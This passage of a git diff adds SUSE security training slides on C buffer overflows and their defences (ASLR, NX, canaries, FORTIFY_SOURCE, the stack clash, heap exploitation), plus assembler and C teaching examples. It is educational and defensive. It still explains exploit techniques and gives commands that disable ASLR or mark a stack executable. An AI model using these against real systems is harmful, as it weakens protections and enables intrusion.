lower level. + +Not Leaving Sensitive Data Behind in C: A Difficult Task +-------------------------------------------------------- + +Even in pure C programming there are difficulties: + +[role="incremental"] +* Write operations like `memset()` can be optimized out by compilers, leading +to hard to find surprises (see example folder `lost_memset`). +* Data can even be left behind in registers and for example for accelerated +cryptographic operations some rare registers might be used that will not be +typically overwritten by other code (e.g. MXX, SSE extensions). +* The low-level handling implemented by the compiler may cause data to be +swapped in and out of registers, leaving copies of data on the stack without +our knowledge. +* There's `memset_s()` in newer language standards starting from 'C11' and +'C++11' (but in 'C11' it is optional). There's also `explicit_bzero()` (BSD) or +`SecureZeroMemory()` (Microsoft Windows). +* 'gcc' supports `-fno-builtin-memset` to avoid optimizing away the memset() +function call, however this might hit performance for other code locations. +* Generally we're in a fight here against the philosophy of the C programming +language and the optimization routines of compilers. Even if we win for the +moment we can't be sure if we don't lose next time. And this condition is +difficult to detect even in unit tests or alike. +* Actually we'll be needing a kind of language extension for a clean approach. +For today it needs to suffice that we're aware of these issues and do our best +to solve them. + +An Optimization Proof memset(): A Best Effort Approach +------------------------------------------------------ + +For writing a `memset()` wrapper/replacement that is likely not to be +optimized out we can take the following approach: + +[role="incremental"] +* Put the function in an isolated compilation unit that is compiled without +optimizations (i.e. `-O0`). +* The parameter pointing to the buffer to be zeroed should have the `volatile` +qualifier. +* This compilation unit should be passed `-fno-builtin-memset` or a similar +option suitable for the target compiler. + +Protection Mechanisms Against Stack Overflows: Intro +---------------------------------------------------- + +* The typical stack overflow vulnerability has been around for many decades and +nowadays a number of protection mechanisms are in place that prevent many +otherwise dreadful security issues. +* In the following slides we will discuss the most common of these +protection techniques. + +Protection Mechanisms Against Stack Overflows: Coding +----------------------------------------------------- + +=== Most Important Protection: Safe Coding Practices + +[role="incremental"] +* When there's no bad code then there's nothing to protect from in the first +place. Thus we shouldn't rely on some magic protection helping us but on our +own coding skills for getting security right. +* The protection mechanisms are only a last resort when things already have +gone downhill. +* Therefore always be prudent in your program: +[role="incremental"] +** Only very carefully and restrictively process untrusted input. +** Strictly check your buffer lengths. Everywhere. +** Always check return codes, even for seemingly unimportant calls. Even safe +functions can be used in unsafe ways. +** Initialize stack and heap data with conservative values (rather fail in a +safe way than succeed in a dangerous way). +** Don't use dangerous functions like `gets()` or `strcpy()` that don't +implement length restrictions. +** Encapsulate repetitive and complex memory management operations in abstract + functions. +** When you really want to optimize e.g. by leaving larger buffers + uninitialized or by using dangerous functions then clearly document the + purpose and the conditions surrounding it. +* Use tools for detecting otherwise not easily visible issues. For example: +[role="incremental"] +** Enable the maximum warning level of the compiler, except for diagnostics + that might be more noise than value. +** Use 'valgrind' to detect invalid memory read/write, undefined data usage, +memory leaks (it is not perfect for stack issues though). +** Test with builds compiled with `-fsanitize=address` which will add +transparent routines to detect memory errors during runtime. +** Use 'American Fuzzy Lop', a fuzzing tool to feed automatically generated +data into your software. +* Integrate such tools into continuous integration test suites, unit test + suites etc. + +Protection Mechanisms Against Stack Overflows: Many Eyes for Review +------------------------------------------------------------------- + +When you're working on a sensitive code portion or writing a lot of new +interfacing code then you should have somebody reviewing that code. + +Protection Mechanisms Against Stack Overflows: Know your C library functions +---------------------------------------------------------------------------- + +[role="incremental"] +* You need to carefully read man pages or other applicable documentation about +C library and other library/framework functions. +* If you're unsure, read again. Even experienced programmers need to check up +on basics sometimes. +* When you're implementing buffer handling functions yourself then please +carefully document them so others (and yourself) can know what to expect of +them. Try to model them after well known (and safe) behaviour from standard +functions. +* Beware of false friends: There are functions that look safe but aren't. An +example is the 'strncpy()' function: +[role="incremental"] +** It does take a size parameter, but will not `'\0'` terminate the destination +string if the source string is too long. +** It was actually designed for keeping zero-padded strings of fixed size, not +for safe string copying. +** It is not efficient, because it will zero-pad the complete destination +buffer. For example `strncpy(path, PATH_MAX, src)` will actually write nearly +4 kb of zeroes, even when `src` is a short string. +** A good replacement is `snprintf(target, bytes, "%s", source)`. + +Protection Mechanisms Against Stack Overflows: Choice of Language +----------------------------------------------------------------- + +If performance and low level system programming are not major requirements +then you're better off using a safer programming language like `python`, +`ruby`, `rust` or `go`: +[role="incremental"] +Since those languages themselves might be implemented in C they can still +suffer from overflow vulnerabilities, but the languages as such usually +enforce bounds checking for you. + +[role="incremental"] +If you do have tight performance or system programming requirements then ... + +Protection Mechanisms Against Stack Overflows: Choice of Language +----------------------------------------------------------------- + +My personal opinion: Try to avoid C programming for userspace programs: + +[role="incremental"] +* Memory and string handling simply is a *pain* in plain C. +* Attempts to simplify it like in 'glib' tend to result in inefficiencies, +because strings are copied much (`strdup()`) to avoid having to deal +with ownership. +* C++ makes string handling already way easier and memory management more +automatic by using constructors/destructors and reference counting using +`shared_ptr` and alike. +* Even if you don't use other fancy stuff like templates it is worth +it to make the switch. +* Backward compatibility to C allows interaction with all the low level +libraries and system calls without problems. +* You can still offer a C compatible interface to the outside if you're +writing libraries or alike. +* You might need to avoid or take care about 'libstdc++', however, in some +lean and mean environments (things like 'initrd'). + +Protection Mechanisms Against Stack Overflows: Choice of Language +----------------------------------------------------------------- + +The Rust programming language is currently very popular: + +[role="incremental"] +* it has security "built-in", because there are practically no ways to break + memory management, except if explicitly desired by use of so called unsafe + functions. +* it makes error handling more or less mandatory. +* it is a compiled, mostly static programming language so it can also generate + highly optimized code comparable to C. + +[role="incremental"] +It also has some downsides in my opinion: + +[role="incremental"] +* it doesn't offer all features of classic object-orientation and its + memory model is rather hard to grasp at first - if you're used to other + languages. +* it uses only static linking and can result in really fat binaries that have + tons of third party package code in its belly. +* the native dependency handling (also in Go and some other new languages) + ease and standardize the development, but this also brings new risks: Each + dependency can also be a maintenance burden, and suddenly the responsibility + for using safe third party libraries lies in the hands of countless + developers instead of in the hands of distributors that specialize on this. + +Protection Mechanisms Against Stack Overflows: ASLR +--------------------------------------------------- + +One approach to make stack buffer overflows much harder to exploit is 'address +space layout randomization (ASLR)': + +[role="incremental"] +* When active, memory segments like the stack, heap and code are loaded at +random locations for every start of a program. +* Why does this help against stack overflows? +[role="incremental"] +** We can't guess return addresses into exploit code or C library code +reliably any more. +** Every program instance on every machine uses different addresses, once an +exploit attempt on an address is made, the program typically crashes on +failure. So no reiteration is possible. +** Before ASLR, attackers could inspect typical binaries in use for vulnerable +software, determine stack addresses for them, write an exploit that matches +it and attack all those machines using the exploit. This is no longer possible +with ASLR. + +Protection Mechanisms Against Stack Overflows: ASLR II +------------------------------------------------------ + +Suitable assembler code needs to be generated by the compiler to make full use +of ASLR. This is because the assembler code must not contain hard coded +addresses for stack and code locations any more, but must operate using base +pointers set during runtime. + +It is called 'position independent code', because it doesn't matter where in +address space the code is placed, it will still work when run (just like our +`execve` code snippet, incidentally). + +[role="incremental"] +* For fully taking advantage of ASLR, library code needs to be compiled +with `-fpic`. Executables need to be compiled with the `-fpie` switch and +linked with `-pie`. Object files compiled with `-fpie` can only be used for +linking executables, not libraries any more. +* *Beware*: If some object files are not compiled the right way, then the +resulting binary might silently not utilize ASLR for the code segment. +* If a binary is not fully position-independent then only parts or none of the +memory segments are loaded at random addresses. +* There is a tool named 'hardening-check' that helps to check hardening +properties of ELF Linux binaries. Run it against an executable and check for +the output row 'Position Independent Executable' to determine whether it will +fully support ASLR. +* You can see ASLR in action by running for example `bash -c 'cat +/proc/$$/maps'`. You can see the addresses of various segments changing for +each run, or not, depending on which parts are using ASLR. +* In SUSE distributions we've enabled PIE executables by default now in +Tumbleweed and LEAP-15/SLE-15. Before that only those packages that explicitly +added correct compiler and linker flags have created PIE executables. There's +also an rpmlint warning now when your package ships non-PIE executables. +* Some newer programming environments like Golang make it more difficult to + generate PIE binaries by default, because of their special (and still + somewhat evolving) linking model. + +Protection Mechanisms Against Stack Overflows: ASLR III +------------------------------------------------------- + +Potential issues with ASLR. Which problems do you see? + +[role="incremental"] +* The position independent code requires an additional register for storing + the base address of e.g. code on some architectures. Thus it can slow down + programs, which was/is especially true on 'i386' machines (5 - 10 % + performance loss). +* Some architectures like 'x86_64' provide special instructions or registers + that make implementing position independent code easy and no performance + penalty. +* On machines with 32-Bit address spaces like 'i386' the available limited + address space can make 'guessing' the right addresses easier, while on 64-Bit + architectures a very large amount of possible segment locations makes ASLR way + stronger. +* Some exotic software might rely on fixed addresses, because of inline + assembly code, for example. This software would break (or not compile) when + running with ASLR. +* Leaking addresses of objects in memory into log files or via information + leaks like stack overread can give attackers valuable information to counter + ASLR. The combination of an information leak and a stack overflow would thus + enable code execution again. +* An attacker should not get the possibility to test many different return + addresses against a vulnerable program. Thus programs should not restart + indefinitely after crashing but employ some grace period before restarting + again. The grsecurity kernel patches offer such a feature on kernel level + (blocks program start for even a whole minute after it crashed unexpectedly). +* In the past some weaknesses of Linux's ASLR implementation have been + discussed, e.g. https://www.openwall.com/lists/oss-security/2018/02/27/5. + There it was outlined that the randomness of the mappings was not really + *that* random. + +Protection Mechanisms Against Stack Overflows: ASLR IV +------------------------------------------------------ + +Some practical tips: + +[role="incremental"] +* Running a program in 'gdb' disables ASLR by default for getting reproducable +addresses between individual runs. +* You can get/set the status in 'gdb' via `info disable-randomization` and +`set disable-randomization [on|off]`. +* For programs running outside of 'gdb' you can disable ASLR (for testing +purposes, for example our exploit examples above) by using the 'setarch' tool +like this: +[role="incremental"] +---- +setarch `uname -m` -R /bin/bash +---- +[role="incremental"] +* This will give you a bash shell with disabled ASLR. This attribute will be +inherited to child processes. + +Protection Mechanisms Against Stack Overflows: NX Bit for Stack and Heap +------------------------------------------------------------------------ + +Modern processors support memory to be mapped as non-executable. The hardware +support is important for performance of this security feature. Using this +feature, the OS can map memory that does not typically contain executable code +as non-executable (also called NX bit). Another term for this +feature is 'W^X' (writable xor executable i.e. either writable or executable +memory). Both should never be necessary except for exotic software. + +[role="incremental"] +The most interesting memory types for this feature to use are the stack and +heap memory regions. The stack is never executed, it just serves as a scratch +area while functions execute, to keep administrative and local data. + +[role="incremental"] +Should a program violate the protection settings of a memory region then a +SEGFAULT will occur and program execution terminates (typically). + +[role="incremental"] +* Why does it protect against security issues to have this? +* A stack overflow could still take place, but it would not be possible to +return to a stack address for execution. +* Existing code in memory cannot be changed into malicious code. + +Protection Mechanisms Against Stack Overflows: NX Bit for Stack and Heap II +--------------------------------------------------------------------------- + +[role="incremental"] +* You can check for a protected stack mapping in '/proc/$$/maps', there should +not be an 'x' bit for the '[stack]' segment: +[role="incremental"] +---- +$ cat /proc/$$/maps | grep -w stack +7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] +---- +[role="incremental"] +* There's a package 'execstack' that helps examining and changing whether an +executable stack will be available for a binary: +[role="incremental"] +---- +# the '-' minus shows it has no executable stack +$ execstack /usr/bin/ls +- /usr/bin/ls + +$ execstack -s /my/binary +# 'X' shows that the binary will get an executable stack +$ execstack /my/binary +X /my/binary +---- +[role="incremental"] +* It is a flag in the ELF headers of a binary that indicates to the OS +whether an executable stack is required. +* Some programs may explicitly need an executable stack when they're doing +unusual things (Java virtual machines are likely candidates). +* Some programs (mostly experimental ones) employ self-modifying code which +also conflicts with some of these settings. + +Protection Mechanisms Against Stack Overflows: NX Bit for Stack and Heap III +---------------------------------------------------------------------------- + +The memory protection relies on the hardware support. If it is not available +then we can't make use of it. This especially affects 32-Bit Linux on 'i386' +machines: + +[role="incremental"] +* Even though newer 'i386' processors support this in hardware, some +distributions like SUSE don't support the NX bit in their kernels, because +then the kernel would not work on older CPUs like the Pentium MMX, Celeron M +and Pentium M. +* This also affects 32-Bit Linux distributions running on 'x86_64' CPUs in +these cases. +* You can check your kernel log for the following message: +[role="incremental"] +---- +$ dmesg | grep NX.*protection +NX (Execute Disable) protection: active +---- +[role="incremental"] +* This will show you that from the kernel/hardware side the support is +present. +* There might also be a BIOS setting that influences this. + +Protection Mechanisms Against Stack Overflows: Stack Canary Values +------------------------------------------------------------------ + +Another protection technique is the use of so called canary values on the +stack. + +=== So what do we need a canary for? +[role="incremental"] +https://share.america.gov/english-idiom-canary-coal-mine[Explanation for the idiom] + +[role="incremental"] +=== How it Works + +// disassembly of a stack protected function shows some lines at the end that +// just do the expected thing. It's using thread local storage and the %fs +// segment register, however. +// there seems to be no way of reading this register in gdb. + +* The compiler generates extra code that puts a canary value at predefined +locations within a stack frame. +* There are different approaches how the canary value is exactly computed. +* Before returning from a function call some extra check code runs, that tests +whether the canary value is still the expected one, if not then the execution +of the program is aborted. +* How does this help prevent security issues? +[role="incremental"] +** Since the stack buffer overflow almost always relies on some valid target +address on the stack being overflown, the exploit always needs to write *some* +data linearly on the stack until it finally reaches the return address. +** Thus it is bound to overwrite the canary value setup by the compiler. +** The only way around it would be for the exploit to know the correct canary +value to overflow with, which is normally very hard or countered by the +canary value containing typical terminator characters like '\0', '\n', '\r', +or being based on random values chosen during program initialization. + +Protection Mechanisms Against Stack Overflows: Stack Canary Values II +--------------------------------------------------------------------- + +[role="incremental"] +* To enable stack canary values pass one of the following switches to GCC: +[role="incremental"] +** `-fstack-protector` which will enable the extra code only for +functions that put susceptible buffers on the stack (buffers larger than 8 +bytes). +** `-fstack-protector-all` which will enable the extra code for each and every +function. +* The protection code introduces some performance penalty especially for +functions that are called very often (e.g. in loops, recursively). +* `-fstack-protector` should be enabled in all cases though, there are little +downsides to this. +* Use `hardening-check` on executables or libraries to check for enabled stack +protection. + +Protection Mechanisms Against Stack Overflows: Fortify Source Macro +------------------------------------------------------------------- + +The compiler can in some cases transparently fixup well-known function calls +to prevent buffer overflows. This can be done for 'glibc' by passing +the macro definition `-DFORTIFY_SOURCE=3` to the compiler. This needs to be +added to the compiler command line, not into source files, to avoid +inconsistencies. + +[role="incremental"] +* Calls to standard functions like `memcpy, mempcpy, memmove, memset, strcpy, +stpcpy, strncpy, strcat, strncat, sprintf, vsprintf, snprintf, vsnprintf` and +`gets` will receive additional security checks as far as this is possible. +* Because often statically sized buffers placed on the stack are used, the + compiler can even check an unsafe call to strcpy() whether it overflows the + target buffer. +* This comes at little cost and should be enabled in all cases. +* Use `hardening-check` on executables or libraries to check for enabled +fortify source functionality. +* The level `3` is rather new and supports more cases where the buffer sizes + are not directly constants. + +Remaining Concerns +------------------ + +[role="incremental"] +* The protection mechanisms presented so far provide a good deal of security +that make successful exploitation of most of the stack buffer overflow +examples we've shown much harder. +* This is true at least for modern machines, not so much for 'i386' processors +as we have discussed above. +* There can still be subtle ways in which buffer overflow vulnerabilities can +cause security problems: +[role="incremental"] +** Even if arbitrary code execution is difficult to achieve, we still have +program abort and thus a denial-of-service on our hands. This can still be +very bad when thinking of a production critical network service for thousands +of users. +** Overwriting existing parameters on the stack can cause interesting results +without requiring knowledge about addresses, overwriting a canary value or +changing the return address. Variations of the 'param_injection' example can +still work even when all protection is in place. +** When internal program state information is leaked via logging, debugging or +separate security issues in a program then parts of the security mechanisms +may be compromised (see also <>). + +Remaining Concerns: Return Oriented Programming +----------------------------------------------- + +[role="incremental"] +* Return oriented programming is an exploit technique that can bypass 'W^X' +memory protections by simply calling into bits of existing code. +* Existing functions from the affected program and libraries like 'glibc' +contain various instructions that can be carefully tailored towards an +exploit. +* This is an advanced exploit technique but is has been shown that it can be +"turing complete" i.e. the bits of code can be used to derive a fully +functional programming environment. + +Remaining Concerns: The Stack Clash +----------------------------------- + +[role="incremental"] +* Some years ago a high severity security issue has come to our attention +called "the stack clash" (https://bugzilla.suse.com/show_bug.cgi?id=1037551[bsc#1037551]). +* This is actually a problem that has been known for a decade already but has +not been fixed thoroughly enough in the past. +* This is an issue that occurs when the heap (or other read-write memory +segment) and stack memory areas start to overlap. +* Since the stack starts on an upper memory range in address space and grows +down and the heap starts on a lower memory range in address space and grows +up, there is the possibility that both meet each other when large amounts of +memory are allocated. +* The Linux kernel added a so called stack guard page that is supposed to +detect this situation and abort program execution, when a write to it occurs. +* There have still been possibilities to get past this page when large +uninitialized buffers have been placed on the stack, that didn't cause writes. + +Remaining Concerns: The Stack Clash II +-------------------------------------- + +image::images/stack_clash.png[align="center"] + +Remaining Concerns: The Stack Clash III +--------------------------------------- + +[role="incremental"] +* The stack clash works way easier on 'i386', because the address space is much +smaller there and closing the gap between memory segments is feasible. +* To increase the size of heap and stack different caller controllable +mechanisms can be employed: +[role="incremental"] +** environment variables and command line arguments which will be placed in +the stack segment. +** memory leaks in the program that cause the heap to grow. +* Once two memory regions overlap each other a way needs to be found to either +influence the content found on the stack or the content found on the heap to +influence the execution of the program. This is specific to the attacked +program and the used approach. +* The 'exim' exploit published by Qualys uses the fact that a command line +argument is copied to the heap, which is now actually pointing to the stack, +for triggering a stack overflow. +* This attack is particularly interesting against local setuid root binaries, +because they are started in user context with user arguments and environment +but run with elevated privileges i.e. when we can cause an 'execve()' we'll +get a root shell. +* Since basic assumptions about the program's memory structure are violated in +the stack clash situation, some of the buffer overflow protection mechanisms +may not be effective any more. + +Remaining Concerns: The Stack Clash IV +-------------------------------------- + +So how is this clash fixed? The current fix is multi-fold: + +[role="incremental"] +* The stack guard area size has been increased to a larger size and should +also be configurable for administrators to tune it. +* The limits on heap/stack/environment size should be enforced correctly which +was not completely the case. +* A heap memory leak issue in 'glibc' has been fixed that facilitated the +stack clash. +* Compiling programs with '-fstack-check' is supposed to help but 'gcc' was not +correctly implementing this at the time, so it was only a partial fix. + +What about the Heap? +-------------------- + +[role="incremental"] +* So far we've concentrated on exploiting stack based issues. +* What are the security issues with heap buffer overflows? +* How is the heap managed? +[role="incremental"] +** The heap is a separate memory segment that can be extended or decreased +using the `sbrk()` and `brk()` system calls. +** A heap allocator is responsible for managing this memory area for keeping +a large amount of differently sized objects that will be allocated and freed +in seemingly random patterns. +** Equally sized chunks are kept in pools or lists and are chained by keeping +next/prev points in front or back of the chunks. +* Heap issues are generally more difficult to exploit, because the heap is not +part of the regular execution flow in a program. + +Heap Buffer Overflows +--------------------- + +[role="incremental"] +* If the allocator keeps management data at the end of a heap chunk then we +may be able to overwrite this data in a way that causes interesting things to +happen during `free()` time (triggering arbitrary memory writes is an aim +here). +* If the chunk we can overflow is followed by another heap chunk: +[role="incremental"] +** We could manipulate management data of the next heap chunk, in case the +allocator keeps this data at the front of each chunk. +** Otherwise we can manipulate some application specific data. +* If we can overflow into a member of a struct kept on the heap then we might +be able to influence other data in the struct to our advantage. +* The heap allocator's algorithm will differ between 'glibc' versions, +memory management wrappers and programming languages so the exploits cannot be +as generic as with stack buffer overflows. +* On the "plus" side there are less protection mechanisms that apply to heap +buffer overflows. + +Heap Memory Leaks +----------------- + +[role="incremental"] +* Memory leaks on the heap could be used to obtain a range of addresses for +keeping or duplicating exploit data. +* They also serve a purpose in the stack clash discussed before. + +Heap Use After Free +------------------- + +[role="incremental"] +* When a part of heap memory is `free()'d` but still used by some part of the +application (use after free) then an attacker can attempt to trigger some new +heap allocation that will be placed just into that memory location. +* Now there live different objects in the application that point to the same +memory. Imagine some "harmless" description text that is stored on the heap. +Some other part of the program now points to that data, assuming some pointers +or other application specific data still lives there. By manipulating the +"harmless" description text the attacker now also controlls completely +unrelated data. +* By skillfully constructing the data in the heap buffer it might +be possible to cause unintended program behaviour or even arbitrary code +execution. Each case is individual to the vulnerable application though. + +Heap Unitialized Data +--------------------- + +[role="incremental"] +* Similarly to what we've seen for the stack, any new memory obtained via +`malloc()` will contain undefined data. +* This data could cause an information leak if read without initializing the +data. +* In worse cases, decisions may be based on uninitialized data. + +Heap Exploit Techniques +----------------------- + +[role="incremental"] +* Many principles we've learned from stack buffer overflows will be reused in +exploiting heap buffer overflow vulnerabilities. +* For example the NOP slide can be used in creating better odds when trying to +hit injected data or code. An extended technique is known as 'heap spraying' +where the same data is placed on the heap a lot of times to increase the +amount of valid addresses e.g. for executing code. +* In combination with information leaks can then help determining the correct +address for manipulations to work. + +Heap Protection Mechanisms +-------------------------- + +[role="incremental"] +* The following counter measures also work in the case of heap vulnerabilities: +[role="incremental"] +** Safe coding practices as listed for stack vulnerabilities. +** ASLR also helps here, because the heap is randomly placed into the address +space, too. +** NX bit also applies to the heap, so executing it directly should be +prevented, although there are other techniques like changing the PLT +(Procedure Lookup Table) of the program. +* These are measures that could be taken but depend on the allocator: +[role="incremental"] +** An allocator could attempt not to return recently used chunks again so soon +but that would be another burden on the allocator algorithm. +// TODO: check current malloc()/free() +** There are no general heap canary values as far as I know, although it would +be generally possible to introduce them. There are some additional security +checks in treating the heap metadata in some allocators. +** For example it can be checked whether a heap chunk pointer actually is +within a certain expected memory range. + +The End +------- + +[role="incremental"] +Hopefully all of you have been able to learn something new in this training +and to better understand how computers work on the lower level, how buffer +management related security issues work and how to prevent them. + +[role="incremental"] +On the final slide I am listing a couple of references that I have used for +putting together the knowledge for this training material and that can be used +for diving deeper into some of the topics we have touched. + +References +---------- + +* About clearing buffers and optimized away `memset()` code: +** 'Zeroing buffers is insufficient': http://www.daemonology.net/blog/2014-09-06-zeroing-buffers-is-insufficient.html +** 'std::memset description' (see Notes): http://en.cppreference.com/w/cpp/string/byte/memset +* Tutorial for stack overflow exploitation on i386 32-Bit Linux, on which +parts of this training have been based on: +** 'Smashing The Stack For Fun And Profit': http://insecure.org/stf/smashstack.html +* Wikipedia article regarding return oriented programming: +** https://en.wikipedia.org/wiki/Return-oriented_programming +* An open book offering an introduction to x86 32-Bit assembler programming. +If you want to dive into assembler a bit more this is a good way to go. Parts +of the book are for beginners in programming in general, but the assembler +part is good to understand. For x86_64 assembler you'll need to adjust the +concepts: +** 'Programming from the Ground Up': https://savannah.nongnu.org/projects/pgubook/ + +// provide example code via DropBox step by step? +// final stuff for reference can be distributed via git repo or tarball diff --git a/examples/.gitignore b/examples/.gitignore new file mode 100644 index 0000000..6286bab --- /dev/null +++ b/examples/.gitignore @@ -0,0 +1,8 @@ +simple +stack_frame +overread +**/*.o +*.bin +*_asm +*_bin +heap_overflow diff --git a/examples/address_space_basics/Makefile b/examples/address_space_basics/Makefile new file mode 100644 index 0000000..6b0d1f1 --- /dev/null +++ b/examples/address_space_basics/Makefile @@ -0,0 +1,13 @@ +MAIN = simple +SOURCES = $(wildcard *.c) +OBJECTS = $(SOURCES:.c=.o) +CFLAGS ?= -g + +$(MAIN): $(OBJECTS) + gcc $(OBJECTS) -o $(MAIN) + +%.o: %.c + gcc $(CFLAGS) -c -Wall -Werror $< -o $@ + +clean: + rm -f $(MAIN) $(OBJECTS) diff --git a/examples/address_space_basics/README.md b/examples/address_space_basics/README.md new file mode 100644 index 0000000..8f3a126 --- /dev/null +++ b/examples/address_space_basics/README.md @@ -0,0 +1,20 @@ +Example Program For Exploring Address Space Basics on a Linux System +==================================================================== + +Compile and run the Program +--------------------------- + + $ make + # don't enter a newline once it started, keep the program running + ./simple + +Compare the Addresses +--------------------- + +Compare the addresses printed by the program on stdout with the address +ranges the kernel knows about. In another shell type: + + $ cat /proc/`pidof simple`/maps + +Can you find out to which memory areas the distinct types of data and +functions belong to? diff --git a/examples/address_space_basics/simple.c b/examples/address_space_basics/simple.c new file mode 100644 index 0000000..9139a85 --- /dev/null +++ b/examples/address_space_basics/simple.c @@ -0,0 +1,44 @@ +#include +#include + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + * + * A simple program that only prints the addresses of various types of + * variables, constants and functions in address space. + * + * Compare this to /proc//maps. + */ + +const int const_global[] = { 1, 2, 3 }; + +int var_global[10] = { 0 }; + +#define HEAP_DATA_LEN 1024 + +int main() { + // stack variables are implicitly of the C storage class 'auto' in + // contrast to e.g. 'static'. + int stack_var = 4711; + char *heap_data = malloc(sizeof(char) * HEAP_DATA_LEN); + + printf("memory addresses\n"); + printf("----------------\n\n"); + printf("main() function = %p\n", main); + printf("const_global = %p\n", const_global); + printf("var_global = %p\n", var_global); + printf("stack_var = %p\n", &stack_var); + printf("heap_data = %p\n", heap_data); + + // just block on stdin for input so we can inspect the process while + // it's running + printf("\nwaiting for newline to end execution\n"); + fflush(stdout); + fgets(heap_data, HEAP_DATA_LEN, stdin); + + free(heap_data); + + return 0; +} diff --git a/examples/as_intro/Makefile b/examples/as_intro/Makefile new file mode 100644 index 0000000..0f934b5 --- /dev/null +++ b/examples/as_intro/Makefile @@ -0,0 +1,12 @@ +MAIN = intro +SOURCES = $(wildcard *.s) +OBJECTS = $(SOURCES:.s=.o) + +$(MAIN): $(OBJECTS) + ld $(OBJECTS) -o $(MAIN) + +%.o: %.s + as -g $< -o $@ + +clean: + rm -f $(MAIN) $(OBJECTS) diff --git a/examples/as_intro/README.md b/examples/as_intro/README.md new file mode 100644 index 0000000..9355a3f --- /dev/null +++ b/examples/as_intro/README.md @@ -0,0 +1,87 @@ +Hello World Assembler Program +============================= + +In `intro.s` you will find an example assembler program that will print out +"hello world" to stdout. The `.s` extension is conventionally used for +assembler code. + +Building and Running the Program +-------------------------------- + +The program can simply be built using `make`: + +``` +$ make +$ ./intro +[...] +``` + +In the Makefile you can see how the program is built. Calling the GNU +assembler `as` directly only created an object file. It still needs to be +linked by calling the linker `ld` explicitly on the resulting object file. + +The `gcc` compiler itself is only generating assembler code on-the-fly which +is passed to the assembler to generate machine code. + +The Assembler Program Structure +------------------------------- + +Look at the assembler source and try to understand its structure. It mainly +consists of different sections for declarations, code and data. Jumps (like +a `goto` in C) are the basic mechanism of flow control. To actually make an +assembler program human readable a lot of comments are needed, because you +can't just declare a variable by name like in higher programming languages. +All you have are labels for performing jumps and for accessing constant data. + +The Equivalent C Program +------------------------ + +The assembler program we see here is roughly equivalent to the following C +program: + +``` +#include + +int main() { + int i = 10; + + do { + write(STDOUT_FILENO, "Hello, world\n", 13); + } while (--i > 0); + + _exit(0); +} +``` + +It is clearly visible that in C the program is shorter and easier to +understand. + +You can also try to see what kind of assembler output the compiler would +generated for such a program by storing the above program in a file `intro.c` +and calling `gcc -S intro.c -ogcc_intro.s`. The generated assembler code will +be more difficult to understand though, since the compiler is using all kinds +of expert knowledge to organize the assembler code. + +Experimenting with the Assembler +-------------------------------- + +You can run the program in `gdb` and inspect the various registers while +running. There is a special command to deal with Assembler in `gdb`: +`stepi`. This command will continue program execution for exactly one +processor instruction. You will also need to set a special breakpoint, because +our assembler program does not conform to usual program conventions as when a +program is compiled by `gcc`: + +``` +gdb ./intro +[...] +(gdb) b _start +(gdb) r +Breakpoint 1, _start () at intro.s:7 +(gdb) stepi +[...] +(gdb) info registers +``` + +Also try to understand the purpose of the `eip` or `rip` register as the +instructions progress. diff --git a/examples/as_intro/intro.s b/examples/as_intro/intro.s new file mode 100644 index 0000000..616263c --- /dev/null +++ b/examples/as_intro/intro.s @@ -0,0 +1,31 @@ + .global _start # this declares the start code label where execution + # begins when the program is started by the kernel. + + .text # this declares a code section +_start: + mov $10, %rbx # store the loop counter 10 in rbx +loop_start: + # write(1, message, 13) + mov $1, %rax # system call 1 is write + mov $1, %rdi # parameter 1: file descriptor 1 is stdout + mov $message, %rsi # parameter 2: address of string to output + mov $13, %rdx # parameter 3: number of bytes in string + syscall # invoke operating system to perform the syscall + + # loop handling + dec %rbx # decrement the loop counter + jnz loop_start # jump-not-zero: perform another loop operation + # if the counter hasn't hit zero yet. + + # the dec instruction stores a flag that + # indicates zero/non-zero result + + # exit(0) + mov $60, %rax # system call 60 is exit + xor %rdi, %rdi # we want return code 0, this is a cheap instruction to generate a 0 in register rdi + syscall # invoke operating system to exit +message: + # this declares a program constant, ASCII text in this case + .ascii "Hello, world\n" + +# vim: set ts=8: diff --git a/examples/as_stack/.gitignore b/examples/as_stack/.gitignore new file mode 100644 index 0000000..5853a15 --- /dev/null +++ b/examples/as_stack/.gitignore @@ -0,0 +1,2 @@ +stack +*.o diff --git a/examples/as_stack/Makefile b/examples/as_stack/Makefile new file mode 100644 index 0000000..15e3b79 --- /dev/null +++ b/examples/as_stack/Makefile @@ -0,0 +1,12 @@ +MAIN = stack +SOURCES = $(wildcard *.s) +OBJECTS = $(SOURCES:.s=.o) + +$(MAIN): $(OBJECTS) + ld $(OBJECTS) -o $(MAIN) + +%.o: %.s + as -g $< -o $@ + +clean: + rm -f $(MAIN) $(OBJECTS) diff --git a/examples/as_stack/README.md b/examples/as_stack/README.md new file mode 100644 index 0000000..eea771d --- /dev/null +++ b/examples/as_stack/README.md @@ -0,0 +1,63 @@ +Implementing a Function in Assembler +==================================== + +This assembler program is based on the `intro_as` example. The program is +still printing "Hello, world\n" in a loop. But this time the actual print +handling logic has been moved into a reusable function called `print()`. + +To implement this `print()` function the stack frame needs to be established +accordingly. Therefore this example allows us to learn how the stack is +typically used. + +Building and Running the Program +-------------------------------- + +The program can simply be built using `make`: + +``` +$ make +$ ./stack +[...] +``` + +The Assembler Program Structure +------------------------------- + +Look at the differences of this assembler program compared to the `intro_as` +example. Focus on the way the function setup works on both the caller and the +callee side. + +The Equivalent C Program +------------------------ + +The assembler program we use here is roughly equivalent to the following C +program: + +``` +#include + +void print(const char *s, size_t n) { + write(STDOUT_FILENO, s, n); +} + +const char *msg = "Hello, world\n"; + +int main() { + int i = 10; + + do { + const char *m = msg; + size_t n = 13; + print(m, n); + } while (--i > 0); + + _exit(0); +} +``` + +Inspecting the Program Flow +--------------------------- + +In `gdb` you can follow the course of every assembler instruction in this +program. Try to find the return address on the stack when the print() function +is reached. diff --git a/examples/as_stack/stack.s b/examples/as_stack/stack.s new file mode 100644 index 0000000..d7e036b --- /dev/null +++ b/examples/as_stack/stack.s @@ -0,0 +1,66 @@ + # + # Matthias Gerstner + # SUSE Linux GmbH + # matthias.gerstner@suse.com + # + # this declares the start code label where execution is started when + # the program is started by the kernel. + .global _start + + # this declares a code section + .text + + # print a string on stdout + # expects two parameters on the stack: + # - (const char*) pointer: string data to print + # - (uint64_t): 64-bit unsigned integer: length of string data, excluding '\0' terminator +print: # entry point for a print(const char*, size_t) function + push %rbp # save the previous stack base pointer on the stack + mov %rsp, %rbp # the current top of the stack is where our own stack base for hellofunc() is now 